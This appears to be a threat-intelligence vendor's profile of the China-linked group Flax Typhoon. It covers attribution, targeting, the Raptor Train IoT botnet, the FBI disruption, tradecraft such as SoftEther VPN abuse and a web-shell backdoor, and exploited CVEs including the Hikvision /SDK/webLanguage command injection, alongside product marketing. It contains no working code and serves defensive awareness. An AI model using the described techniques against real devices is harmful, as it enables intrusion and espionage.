Flax Typhoon
Flax Typhoon is a China-linked, China-based nation-state threat actor, also referred to as Ethereal Panda and Microsoft cluster Storm-0919. Microsoft described the group as active since mid-2021. U.S. officials and the FBI have stated that Flax Typhoon operated at the direction of the Chinese government, and the FBI assessed that Beijing-based Integrity Technology Group was responsible for intrusion activity attributed to Flax Typhoon. Court documents and government reporting described Integrity Technology Group as a publicly traded Beijing company and PRC government contractor that developed and controlled botnet infrastructure used by the group. The group has primarily targeted government agencies, education, critical manufacturing, and information technology organizations in Taiwan, and has also successfully attacked multiple U.S. and foreign corporations, universities, government agencies, telecommunications providers, media organizations, and critical infrastructure providers. Reporting also links Flax Typhoon to broader targeting of U.S. interests and to activity against critical infrastructure sectors including communications, energy, transportation, and water. Taiwan’s NSB named Flax Typhoon among Chinese groups involved in sustained targeting of Taiwan’s critical sectors, including energy, healthcare, communications, government, and technology. Flax Typhoon has used covert networks of compromised infrastructure to conduct cyber espionage and to disguise malicious activity. Multiple government advisories state that China-nexus actors including Flax Typhoon use large-scale covert networks built from compromised SOHO routers, IoT devices, IP cameras, DVRs, firewalls, and NAS devices across the cyber kill chain for reconnaissance, malware delivery, command and control, and data exfiltration. The group has been linked to the Raptor Train botnet, which Black Lotus Labs assessed with medium to high confidence was operated by Flax Typhoon. U.S. law enforcement disrupted a Flax Typhoon-linked botnet of more than 200,000 consumer devices; separate reporting states the Mirai-variant botnet had exploited more than 260,000 IoT devices globally. The botnet was used to disguise malicious cyber activity as routine internet traffic from infected devices. During the FBI disruption, Flax Typhoon attempted to migrate infected devices and launched a DDoS attack against FBI operational infrastructure. Observed tradecraft includes use of legitimate SoftEther VPN software to obfuscate activity, maintain persistence, and evade detection; protocol tunneling and abuse of external remote services; and maintenance of long-term access, including reporting that the group maintained year-long access by turning an ArcGIS SOE into a web shell backdoor. Reporting also links Flax Typhoon-associated botnet activity to exploitation of vulnerabilities in routers, IP cameras, and NAS devices, with activity including DDoS attacks and data theft.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Where they're from
Attributed origin per open-source reporting.
- CN
Tradecraft
36 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
12 malware families attributed to this actor across reporting.
7 additional families tracked in Mallory.
Associated vulnerabilities
4 CVEs this actor has used in observed campaigns. 4 of them exploited in the wild.
There was also widespread, global targeting, such as a government agency in Kazakhstan, along with more targeted scanning and likely exploitation attempts against vulnerable software including Atlassian Confluence servers and Ivanti Connect Secure appliances (likely via CVE-2024-21887) in the same sectors.
VulnCheck observed an attacker in the wild using mount as a “download and execute” GTFOBin while attempting to exploit Hikvision CVE-2021-36260... CVE-2021-36260 is a command injection vulnerability affecting the /SDK/webLanguage endpoint.
CISA first warned of the issues in September, when it ordered all agencies to patch CVE-2025-20333 and CVE-2025-20362 — two vulnerabilities impacting Cisco Adaptive Security Appliances (ASA).
CISA first warned of the issues in September, when it ordered all agencies to patch CVE-2025-20333 and CVE-2025-20362 — two vulnerabilities impacting Cisco Adaptive Security Appliances (ASA).
Observables
11 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Linked in the content to use of CDN-based traffic concealment techniques and SoftEther VPN to maintain persistence and evade detection.
Referenced as a China-based threat actor involved in activity against the FBI and its partners during a disruption operation.
China-linked APT group referenced as building covert relay infrastructure by compromising consumer-grade IoT and SOHO devices to route attack traffic and evade IP-based blocking.
Uses covert networks of compromised SOHO routers and IoT devices to disguise espionage operations and target critical infrastructure sectors.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.